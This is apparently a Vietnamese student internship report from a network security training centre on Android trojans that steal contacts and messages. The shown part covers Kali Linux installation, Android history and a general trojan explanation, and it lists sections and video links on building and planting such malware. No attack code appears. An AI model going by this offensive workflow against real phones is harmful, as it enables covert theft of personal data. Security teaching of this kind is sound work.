Báo cáo thực tập cuối kì tô thị hường

64
ĐẠI HỌC QUỐC GIA THÀNH PHỐ HỒ CHÍ MINH TRƯỜNG ĐẠI HỌC KHOA HỌC TỰ NHIÊN KHOA ĐIỆN TỬ VIỄN THÔNG TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG & AN NINH MẠNG QUỐC TẾ ATHENA BÁO CÁO THC TP Đề tài: Nghiên cứu các Trojan, Malware cho phép đánh cp dliệu như danh sách contact, tin nhắn trên điên thoại sdng Android và gi ra ngoài GVHD: Thầy Võ Đỗ Thng SVTH: Tô ThHường MSSV: 1120066 TPHCM, ngày 14 tháng 9 năm 2014

Transcript of Báo cáo thực tập cuối kì tô thị hường

ĐẠI HỌC QUỐC GIA THÀNH PHỐ HỒ

CHÍ MINH

TRƯỜNG ĐẠI HỌC KHOA HỌC TỰ

NHIÊN

KHOA ĐIỆN TỬ VIỄN THÔNG

TRUNG TÂM ĐÀO TẠO

QUẢN TRỊ MẠNG & AN

NINH MẠNG QUỐC TẾ

ATHENA

BÁO CÁO THỰC TẬP

Đề tài:

Nghiên cứu các Trojan, Malware cho phép đánh

cắp dữ liệu như danh sách contact, tin nhắn trên

điên thoại sử dụng Android và gửi ra ngoài

GVHD: Thầy Võ Đỗ Thắng

SVTH: Tô Thị Hường

MSSV: 1120066

TPHCM, ngày 14 tháng 9 năm 2014

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 1

LỜI MỞ ĐẦU

Trong những năm gần đây, vấn đề “An toàn và bảo mật thông tin” đang ngày

càng nóng. Với sự phát triển đến chóng mặt của các nền tảng do động như iOS,

Android, Windows Phone cùng với nhiều dòng điện thoại thông minh, vấn đề bảo,

mật thông tin chuyển dần xu hướng từ PC sang mobile đặc biệt là Smartphone. Nếu

bạn đang sở hữu một chiếc Smartphone của Apple, Google Nexus, Samsung, Nokia,

HTC, Sony,…liệu bạn có dám chắc chắn là “dế cưng” của mình không bị nhiễm các

phần mềm gián điệp, nghe lén không?. Vì sao lại như vậy?. Vì theo báo cáo gần đây

của các hãng phần mềm bảo mật như Kaspersky Lab, Norton AV, Avast hay BKAV

số lượng Smartphone bị nhiễm mã độc ngày càng tang. Đặc biệt hệ điều hành Android

là một hệ điều hành phát triển khá nhanh trong những năm gần đây, là một mảnh đất

béo bở cho các Hacker tấn công. Với sự nhẹ dạ cả tin, thiêu hiểu biết của người dùng,

long tham các thứ “Free” như free app, free wifi đã vô tình tiếp tay cho các Hacker

xâm nhập và cài mã độc trên chính chiếc điện thoại của bạn.

Đề tài “Ngiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh

sách contact, tin nhắn trên điện thoại Android và gửi ra ngoài” sẽ giúp giúp nghiên

cứu tìm hiểu cách thức hoạt động, chia sẻ thông tin cũng như cung cấp các giải pháp

để phòng tránh.

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 2

MỤC LỤC

LỜI MỞ ĐẦU ....................................................................................................................................... 1

MỤC LỤC ............................................................................................................................................... 2

LỜI CAM ĐOAN .................................................................................................................................. 3

LỜI CẢM ƠN KHOA ĐIỆN TỬ VIỄN THÔNG ......................................................................... 4

LỜI CẢM ƠN TRUNG TÂM ATHENA ........................................................................................ 5

NHẬN XÉT CỦA GIẢNG VIÊN HƯỚNG DẪN TẠI TRUNG TÂM ..................................... 6

NHẬN XÉT CỦA KHOA .................................................................................................................... 7

A. GIỚI THIỆU VỀ TRUNG TÂM THỰC TẬP ................................................ 8

B. NỘI DUNG THỰC TẬP ......................................................................................... 10

I. Làm trên localhost ..................................................................................................... 10

1. Giới thiệu HĐH Kali Linux ...................................................................................... 10

2. Cài đặt Kali Linux trên VMware: ........................................................................... 12

3. Giới thiệu HĐH Android ........................................................................................... 23

4. Tạo mã độc trên Kali Linux ...................................................................................... 29

5. Đưa mã độc vào thiết bị Android............................................................................ 34

6. Xâm nhập SD card của thiết bị Android từ Kali Linux .................................. 38

7. Cài đặt, nghiên cứu Trojan iCalendar trên Android ..................................... 40

7.1. Giới thiệu ................................................................................................. 40

7.2. Hướng dẫn thực hiện Trojan iCalendar trên Android ................................ 44

II. Làm trên trên môi trường VPS ........................................................................... 49

1. Giới thiệu về VPS ........................................................................................................ 49

2. Cài đặt mã độc trên VPS ............................................................................................ 50

3. Từ VPS xâm nhập vào thiết bị Android ............................................................... 56

4. Đánh cắp tài khoản ...................................................................................................... 60

III. KẾT QUẢ ĐẠT ĐƯỢC ............................................................................................ 63

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 3

LỜI CAM ĐOAN

Tôi xin cam đoan:

Những nội dung trong báo cáo này là do tôi thực hiện dưới sự

hướng dẫn trực tiếp của thầy Võ Đỗ Thắng.

Mọi tham khảo dùng trong báo cáo này đều được trích dẫn rõ ràng tên

tác giả, tên công trình, thời gian, địa điểm công bố.

Mọi sao chép không hợp lệ, vi phạm quy chế đào tạo, hay gian lận, tôi

xin chịu hoàn toàn trách nhiệm.

TPHCM, ngày 14 tháng 9 năm 2014

Sinh viên thực tập

Tô Thị Hường

Danh sách các clip:

- Clip giới thiệu về bản thân và trung tâm Athena

https://www.youtube.com/watch?v=zoIZJRZQnws

- Cài Kali Linux

https://www.youtube.com/watch?v=HysZBsppSRY&feature=em-upload_owner

- Tạo mã độc trên Kali Linux

https://www.youtube.com/watch?v=4nunk80pE48

- Tạo mã độc trên VPS

https://www.youtube.com/watch?v=n6Cy_g9fuu4&feature=youtu.be

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 4

LỜI CẢM ƠN KHOA ĐIỆN TỬ VIỄN

THÔNG

Tôi xin chân thành cảm ơn trường Đại Học Khoa Học Tự Nhiên và khoa Điện

tử Viễn thông đã tạo điều kiện cho tôi hoàn thành tốt đợt thực tập này. Trong đợt

thực tập này đã cho tôi những kinh nghiệm quý báu. Những kinh nghiệm này sẽ

giúp tôi hoàn thiện hơn trong công việc và môi trường làm việc sau này.

Mặc dù tôi đã cố gắng hoàn thành báo cáo thực tập này với tất cả nỗ lực của

bản thân. Nhưng do trình độ hiểu biết và kinh nghiệm thực tế có hạn nên chắc chắn

không thể tránh khỏi những thiếu sót nhất định. Tôi rất mong nhận được sự đóng

góp, chia sẻ để tôi có thể làm tốt hơn nữa.

Một lần nữa tôi xin chân thành cảm ơn.

TPHCM, ngày 14 tháng 9 năm 2014

Sinh viên thực tập

Tô Thị Hường

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 5

LỜI CẢM ƠN TRUNG TÂM ATHENA

Tôi xin cảm ơn giám đốc Công Ty Quản Trị và An Ninh Mạng Quốc Tế

Athena, cùng các anh chị trong công ty. Đặc biệt, tôi xin chân thành cảm ơn thầy

Đỗ Võ Thắng đã nhiệt tình giúp đỡ và hướng dẫn tôi trong suốt thời gian thực tập

tại công ty. Thầy đã tạo mọi điều kiện thuận lợi, cung cấp nhũng kiến thức cần thiết

cũng như đóng góp những ý kiến quý báu để hoàn thành tốt bài báo cáo này.

Mặc dù tôi đã cố gắng hoàn thành báo cáo thực tập tốt nghiệp này với tất cả

nỗ lực của bản thân. Nhưng do trình độ hiểu biết và kinh nghiệm thực tế có hạn nên

chắc chắn không thể tránh khỏi những thiếu sót nhất định. Tôi rất mong nhận được

sự đóng góp, chia sẻ để tôi có thể làm tốt hơn nữa.

Một lần nữa tôi xin chân thành cảm ơn.

TPHCM, ngày 14 tháng 9 năm 2014

Sinh viên thực tập

Tô Thị Hường

Chú thích: hình chụp Giáo viên hướng dẫn (Th.Võ Đỗ Thắng) với sinh viên thự tập (Tô Thị Hường)

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 6

NHẬN XÉT CỦA GIẢNG VIÊN HƯỚNG

DẪN TẠI TRUNG TÂM

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

TPHCM, ngày ... tháng ... năm 2014

Giảng Viên Hướng Dẫn

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 7

NHẬN XÉT CỦA KHOA

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

....................................................................................................................................

TPHCM, ngày ... tháng ... năm 2014

Trưởng Khoa

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 8

A. GIỚI THIỆU VỀ TRUNG TÂM THỰC TẬP

Cơ sở 1_Tại TP Hồ Chí Minh:

- Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế

ATHENA. Số 2 Bis Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí

Minh, Việt Nam.

Điện thoại: ( 84-8 ) 3824 4041 Hotline: 0943 23 00 99

Cơ sở 2_Tại TP Hồ Chí Minh:

- Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế

ATHENA 92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ

Chí Minh, Việt Nam.

Website: www.athena.edu.vn or www.athena.com.vn

Điện thoại: (84-8) 2210 3801

Hotline: 0943 20 00 88

- Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA

được thành lập từ năm 2004, là một tổ chức quy tụ nhiều trí thức trẻ Việt

Nam đầy năng động, nhiệt huyết và kinh nghiệm trong lãnh vực CNTT,

với tâm huyết góp phần vào công cuộc thúc đẩy tiến trình đưa công nghệ

thông tin là ngành kinh tế mũi nhọn, góp phần phát triển nước nhà.

- Lĩnh vực hoạt động:

Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên sâu

quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc

tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI, CEH...

Song song đó, trung tâm ATHENA còn có những chương trình đào tạo cao

cấp dành riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ

Công An, ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài

chính…

Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 9

là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng

cho nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ

Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,…

Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương trình

hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa

Thành Phố Hồ Chí Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện

Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật

Quân Sự…

- Đội ngũ giảng viên:

Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường

đại học hàng đầu trong nước.... Tất cả giảng viên ATHENA đều phải có các

chứng chỉ quốc tế như MCSA, MCSE, CCNA, CCNP, Security+, CEH,có

bằng sư phạm Quốc tế (Microsoft Certified Trainer). Đây là các chứng chỉ

chuyên môn bắt buộc để đủ điều kiện tham gia giảng dạy tại trung tâm

ATHENA.

Bên cạnh đó, các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến

thức công nghệ mới từ các nước tiên tiến như Mỹ , Pháp, Hà Lan,

Singapore,... và truyền đạt các công nghệ mới này trong các chương trình đào

tạo tại trung tâm ATHENA.

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 10

B. NỘI DUNG THỰC TẬP

I. Làm trên localhost

1. Giới thiệu HĐH Kali Linux

Kali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết kế

để kiểm tra bảo mật, thử nghiệm xâm nhập các hệ thống máy tính. Tiền thân của Kali

Linux là BackTrack, xuất hiện năm 2006 và được các chuyên gia đánh giá bảo mật

ưa chuộng sử dụng. Sau 7 năm liên tục phát triển, tháng 3 năm 2013, hãng Offensive

Security đã công bố phiên bản mới của BackTrack có tên là Kali Linux (được xem

như phiên bản BackTrack 6). Kali Linux tập hợp và phân loại gần như tất cả các công

cụ thiết yếu mà bất kì chuyên gia đánh giá bảo mật nào cũng cần sử dụng khi tác

nghiệp.

Nói về ưu điểm của Kali là nói về những thay đổi giữa BackTrack và Kali. So

với BackTrack, Kali có rất nhiều cải tiến:

Kali phát triển trên nền tảng hệ điều hành Debian

Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho

lưu trữ phần mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ

dàng có được các bản cập nhật vá lỗi bảo mật mới nhất và các cập nhật Repository.

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 11

Duy trì cập nhật (up-to-date) đối với các công cụ Penetration Test là một yêu cầu vô

cùng quan trọng.

Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói

của Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt cấu

trúc hệ thống tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem

xét hoặc thay đổi mã nguồn của các công cụ.

Tính tương thích kiến trúc

Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với

kiến trúc ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra. Giờ

đây ta có thể build Kali trên một Raspberry Pi hoặc trên Samsung Galaxy Note.

Hỗ trợ mạng không dây tốt hơn

Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính

là sự hỗ trợ cho một số lượng lớn phần cứng bên trong các thiết bị mạng không dây

hay USB Dongles. Một yêu cầu quan trọng khi các chuyên gia bảo mật thực hiện

đánh giá mạng không dây.

Khả năng tùy biến cao

Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối

với giao diện, giờ đây người dùng đã có thể chọn cho mình nhiều loại Desktops như

GNOME, KDE hoặc XFCE tùy theo sở thích và thói quen sử dụng.

Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai

Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ

điều hành Kali. Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì

chúng ta đều phải cài lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3 năm ngoái).

Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian,

Kali đã dễ dàng hơn trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người

dùng không phải cài lại mới hoàn toàn nữa

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 12

2. Cài đặt Kali Linux trên VMware:

Trước tiên cần tải về file ISO phiên bản mới nhất của Kali Linux trên

link dưới, bài này ta sẽ tiến hành cài phiên bản Kali Linux 1.0.8 64 bit.

http://www.kali.org/downloads/

Hình 2.1.1 Download HĐH Kali Linux

Nếu học Công nghệ thông tin thì chắc chắn bạn sẽ biết đến phần mềm

có tên là VMware. VMware Workstation là một phần mềm tạo máy ảo hàng

đầu. Bạn có thể dùng VMware để tạo 1 máy tính ảo chạy Windows, Linux,

Mac OS hay thậm chí là Android nữa. VMware Workstation 10 là một phần

mềm giả lập hệ điều hành để bàn rất nổi tiếng của hãng VMware Inc. Với

hơn 50 tính năng mới, có thể thay đổi đáng kể cách thức làm việc với các

máy ảo.

Từ giao diện chính của VMware thì nhấn vào File -> New Vitual

Machine (hoặc dùng phím tắt Ctrl + N).

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 13

Chọn Typical và nhấn Next. Đây là những cài đặt mà VMware khuyên

dùng nếu muốn tự thiết lập những tùy chọn thì nhấn vào Custom. Nếu không

rành thì tốt nhất cứ chọn Typical đỡ phiền sau này. Ở đây mình chọn Custom

và nhấn next.

Hình 2.1.2 New Virtual Machine Wizard (Step 1)

Tick vào Installer Disc image file. Và chọn đến file ISO cần cài đặt VMware sẽ tự

nhận diện đó là file iso của hệ điều hành nào.

Hình 2.1.3 New Virtual Machine Wizard (Step 2)

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 14

Sau đó sẽ chọn tên máy ảo và nơi lưu trữ dữ liệu của nó

Hình 2.1.4 New Virtual Machine Wizard (Step 3)

Ở những bước sau thì cứ nhấn Next. Đến đây thì có một tùy chọn là “Customize

Hardware...” Cái này để thay đổi các thông số như dung lượng RAM, Ổ cứng, USB

Controler… Cũng tùy vào hệ điều hành đang cài mà chọn dung lượng cho phù hợp.

VMware cũng đã chọn cho mình 1 dung lượng phù hợp rồi.

Hình 2.1.5 New Virtual Machine Wizard (Step 4)

Sau khi hoàn thành các bước này thì máy ảo sẽ tự động bật và sẽ tiến hành cài đặt

một cách tự động. Tùy vào dung lượng mà quá trình sẽ diễn ra nhanh hay chậm thông

thường thì mất vài chục phút cho đến vài tiếng. Tuy nhiên với những file ISO không

hỗ trợ nhận diện tự động thì bạn vẫn sẽ phải cài bằng tay từng bước như cài win bình

thường (điều này cũng không khó khăn lắm đúng không?)

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 15

Bạn sẽ nhìn thấy màn hình khởi động của Kali. Chọn một trong hai chế độ cài đặt

là Graphical hoặc Text-Mode. Trong bài viết này tôi sẽ chọn Graphical Install

Hình 2.1.6 Graphical Install

Chọn ngôn ngữ, vị trí đất nước của bạn sau đó click Continue

Hình 2.1.7 Select a language

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 16

Hình 2.1.8 Select your location

Bạn cũng sẽ được yêu cầu để cấu hình bàn phím với bàn phím bạn đang sử

dụng

Hình 2.1.9 Configure the keyboard

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 17

Bạn sẽ cần phải cấu hình Network và Password cho tài khoản Root

Hình 2.1.10 Configure the network

Hình 2.1.11 Set up user and password

Tiếp đến bạn sẽ lựa chọn ổ đĩa bạn sẽ cài đặt Kali.

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 18

Hình 2.1.12 Partition disks (Step 1)

Hình 2.1.13 Partition disks (Step 2)

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 19

Hình 2.1.14 Partition disks (Step 3)

Hình 2.1.15 Partition disks (Step 4)

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 20

Hình 2.1.16 Partition disks (Step 5)

Hình 2.1.17 Partition disks (Step 6)

Sau khi cấu hình Partition xong, nhấn Continue để quá trình cài đặt bắt đầu.

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 21

Hình 2.1.18 Install the system

Cấu hình Mirror. Kali sử dụng một kho lưu trữ trung tâm để phân phối các

ứng dụng. Bạn sẽ cần phải nhập thông tin proxy thích hợp khi cần thiết. Chú

ý: Nếu bạn chọn “No” trong màn hình này, bạn sẽ không thể cài đặt các gói từ kho

lưu trữ của Kali.

Hình 2.1.19 Configure the package manager

Tiếp đến là cài đặt GRUB

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 22

Hình 2.1.20 Install the GRUB boot loader on the hard disk

Cuối cùng, nhấp vào Continue để khởi động lại Kali.

Hình 2.1.21 Finish the installation

Màn hình đăng nhập và sau khi bạn đăng nhập vào Kali.

Hình 2.1.22 Kali Linux login

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 23

Giao diện sau khi cài đặt xong:

Hình 2.1.23 Kali Linux OS

3. Giới thiệu HĐH Android

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 24

Lịch sử

Tổng công ty Android (Android, Inc.) được thành lập tại Palo Alto, California vào

tháng 10 năm 2003 bởi Andy Rubin (đồng sáng lập công ty Danger), Rich Miner (đồng

sáng lập Tổng công ty Viễn thông Wildfire), Nick Sears (từng là Phó giám đốc T-

Mobile), và Chris White (trưởng thiết kế và giao diện tại WebTV) để phát triển, theo lời

của Rubin, "các thiết bị di động thông minh hơn có thể biết được vị trí và sở thích của

người dùng". Dù những người thành lập và nhân viên đều là những người có tiếng tăm,

Tổng công ty Android hoạt động một cách âm thầm, chỉ tiết lộ rằng họ đang làm phần

mềm dành cho điện thoại di động. Trong năm đó, Rubin hết kinh phí. Steve Perlman, một

người bạn thân của Rubin, mang cho ông 10.000 USD tiền mặt nhưng từ chối tham gia

vào công ty.

Google mua lại Tổng công ty Android vào ngày 17 tháng 8 năm 2005, biến nó

thành một bộ phận trực thuộc Google. Những nhân viên của chủ chốt của Tổng công ty

Android, gồm Rubin, Miner và White, vẫn tiếp tục ở lại công ty làm việc sau thương vụ

này. Vào thời điểm đó không có nhiều thông tin về Tổng công ty, nhưng nhiều người đồn

đoán rằng Google dự tính tham gia thị trường điện thoại di động sau bước đi này. Tại

Google, nhóm do Rubin đứng đầu đã phát triển một nền tảng thiết bị di động phát triển

trên nền nhân Linux. Google quảng bá nền tảng này cho các nhà sản xuất điện thoại và

các nhà mạng với lời hứa sẽ cung cấp một hệ thống uyển chuyển và có khả năng nâng

cấp. Google đã liên hệ với hàng loạt hãng phần cứng cũng như đối tác phần mềm, bắn tin

cho các nhà mạng rằng họ sẵn sàng hợp tác với các cấp độ khác nhau.

Ngày càng nhiều suy đoán rằng Google sẽ tham gia thị trường điện thoại di động

xuất hiện trong tháng 12 năm 2006. Tin tức của BBC và Nhật báo phố Wall chú thích

rằng Google muốn đưa công nghệ tìm kiếm và các ứng dụng của họ vào điện thoại di

động và họ đang nỗ lực làm việc để thực hiện điều này. Các phương tiện truyền thông

truyền thống lẫn online cũng viết về tin đồn rằng Google đang phát triển một thiết bị cầm

tay mang thương hiệu Google. Một vài tờ báo còn nói rằng trong khi Google vẫn đang

thực hiện những bản mô tả kỹ thuật chi tiết, họ đã trình diễn sản phẩm mẫu cho các nhà

sản xuất điện thoại di động và nhà mạng. Tháng 9 năm 2007, InformationWeek đăng tải

một nghiên cứu của Evalueserve cho biết Google đã nộp một số đơn xin cấp bằng sáng

chế trong lĩnh vực điện thoại di động.

Ngày 5/11/2007, Liên minh thiết bị cầm tay mở (Open Handset Alliance), một hiệp

hội bao gồm nhiều công ty trong đó có Texas Instruments,Tập đoàn Broadcom, Google,

HTC, Intel, LG, Tập đoàn MarvellTechnology, Motorola, Nvidia, Qualcomm, Samsung

Electronics, Sprint Nextel và T-Mobile được thành lập với mục đích phát triển các tiêu

chuẩn mở cho thiết bị di động. Cùng ngày, Android cũng được ra mắt với vai trò là sản

phẩm đầu tiên của Liên minh, một nền tảng thiết bị di động được xây dựng trên nhân

Linux phiên bản 2.6. Chiếc điện thoại chạy Android đầu tiên được bán ra là HTC Dream,

phát hành ngày 22 tháng 10 năm 2008. Biểu tượng của hệ điều hành Android mới là một

con rôbốt màu xanh lá cây do hãng thiết kế Irina Blok tại California vẽ.

Từ năm 2008, Android đã trải qua nhiều lần cập nhật để dần dần cải tiến hệ điều

hành, bổ sung các tính năng mới và sửa các lỗi trong những lần phát hành trước. Mỗi bản

nâng cấp được đặt tên lần lượt theo thứ tự bảng chữ cái, theo tên của một món ăn tráng

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 25

miệng; ví dụ như phiên bản 1.5 Cupcake (bánh bông lan nhỏ có kem) tiếp nối bằng phiên

bản 1.6 Donut (bánh vòng). Phiên bản mới nhất (chính thức) là 4.4 KitKat (bánh

chocolate). Vào năm 2010, Google ra mắt loạt thiết bị Nexus - một dòng sản phẩm bao

gồm điện thoại thông minh và máy tính bảng chạy hệ điều hành Android, do các đối tác

phần cứng sản xuất. HTC đã hợp tác với Google trong chiếc điện thoại thông minh Nexus

đầu tiên, Nexus One. Kể từ đó nhiều thiết bị mới hơn đã gia nhập vào dòng sản phẩm

này, như điện thoại Nexus 4 và máy tính bảng Nexus 10, lần lượt do LG và Samsung sản

xuất. Google xem điện thoại và máy tính bảng Nexus là những thiết bị Android chủ lực

của mình, với những tính năng phần cứng và phần mềm mới nhất của Android.

Đặc điểm

1. Tính mở. Android được xây dựng từ dưới đi lên cho phép người phát triển tạo

các ứng dụng di động hấp dẫn với đầy đủ các điểm mạnh của các thiết bị cầm

tay hiện có. Android hoàn toàn mở, một ứng dụng có thể gọi tới bất kể một chức

năng lõi của điện thoại như tạo cuộc gọi, gửi tin nhắn hay sử dụng máy ảnh, cho

phép người phát triển tạo phong phú hơn, liên kết hơn các tính năng cho người

dùng. Android được xây dựng trên nhân Linux mở. Thêm nữa, nó sử dụng một

máy ảo mà đã được tối ưu hóa bộ nhớ và phần cứng với môi trường di động.

Android mà một mã nguồn mở, nó có thể được mở rộng để kết hợp tự do giữa

các công nghệ nổi trội. Nền tảng này sẽ tiếp tục phát triển bởi cộng đồng phát

triển để tạo ra các ứng dụng di động hoàn hảo.

2. Tính ngang bằng của các ứng dụng. Với Android, không có sự khác nhau giữa

các ứng dụng điện thoại cơ bản với ứng dụng của bên thứ ba. Chúng được xây

dựng để truy cập như nhau tới một loạt các ứng dụng và dịch vụ của điện thoại.

Với các thiết bị được xây dựng trên nền tảng Android, người dùng có thể đáp

ứng đầy đủ các nhu cầu mà họ thích. Chúng ta có thể đổi màn hình nền, kiểu gọi

điện thoại, hay bất kể ứng dụng nào. Chúng ta thậm chí có thể hướng dẫn điện

thoại chỉ xem những ảnh mình thích.

3. Phá vỡ rào cản phát triển ứng dụng. Android phá vỡ rào cản để tạo ứng dụng

mới và cải tiến. Một người phát triển có thể kết hợp thông tin từ trang web với

dữ liệu trên điện thoại cá nhân – chẳng hạn như danh bạ, lịch hay vị trí trên bản

đồ – để cung cấp chính xác hơn cho người khác. Với Android, người phát triển

có thể xây dựng một ứng dụng mà cho phép người dùng xem vị trí của những

người bạn và thông báo khi họ đang ở vị trí lân cận. Tất cả được lập trình dễ

dàng thông qua sự hỗ trợ của MapView và dịch vụ định vị toàn cầu GPS.

4. Xây dựng ứng dụng dễ dàng và nhanh chóng. Android cung cấp bộ thư viện

giao diện lập trình ứng dụng đồ sộ và các công cụ để viết các ứng dụng phức

tạp. Ví dụ, Android có thể cho phép người phát triển biết được vị trí của thiết bị

và cho phép các thiết bị giao tiếp với nhau để có thể tạo nên mạng xã hội chia sẻ

ngang hàng rộng khắp. Thêm nữa, Android còn bao gồm một bộ công cụ đầy

đủ giúp cho việc phát triển trở nên dễ dàng.

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 26

3.1. Giới thiệu về Trojan

Trojan - một chương trình dạng virus, một kẻ làm nội gián trong máy tính của

bạn đã giúp cho hacker điều khiển máy tính của bạn, Trojan giúp hacker lấy những

thông tin quý báu của bạn, thậm chí hắn có thể xóa hoặc định dạng lại cả ổ cứng của

bạn nữa. Trojan có thể nhiễm vào máy của bạn qua tập tin gắn kèm thư điện tử mà

bạn đã vô tình tải về và chạy thử, hoặc có lẫn trong những chương trình trò chơi,

nhưng chương trình mà bạn không rõ nguồn gốc... Ðể "moi ruột" được mật khẩu của

các chủ thuê bao, hacker nội thường sử dụng virus có họ Trojan gửi đến các thuê bao

cần tấn công thông qua thư điện tử (e-mail) dưới dạng dữ liệu đính kèm (File

Attachment). Chỉ cần khi các chủ thuê bao vô tình mở file này, lập tức Trojan được

kích động và tự động sao chép lại tất cả các thông số về mật khẩu của chủ thuê bao.

Không chỉ là mật khẩu truy cập Intemet mà ngay cả đến mật khẩu của hòm thư điện

tử cũng dễ dàng bị đánh cắp. Ngay sau khi chủ thuê bao kết nối Internet, Trojan sẽ bí

mật sinh ra một e- mail và gửi mật khẩu đánh cắp về cho "tin tặc". Và sau đó mỗi lần

thay đổi mật khẩu virus Trojan sẽ tiếp tục lặng lẽ "tuồn" của ăn cắp tới một địa chỉ

mà hacker nội đã định sẵn.

Ðể đánh lừa "nạn nhân", "tin tặc" luôn tìm cách giăng ra những loại bẫy hết sức

tinh vi. Tinh vi đến nỗi không ít chủ thuê bao dù rất 'kỹ tính" nhưng vẫn cứ "sập" bẫy

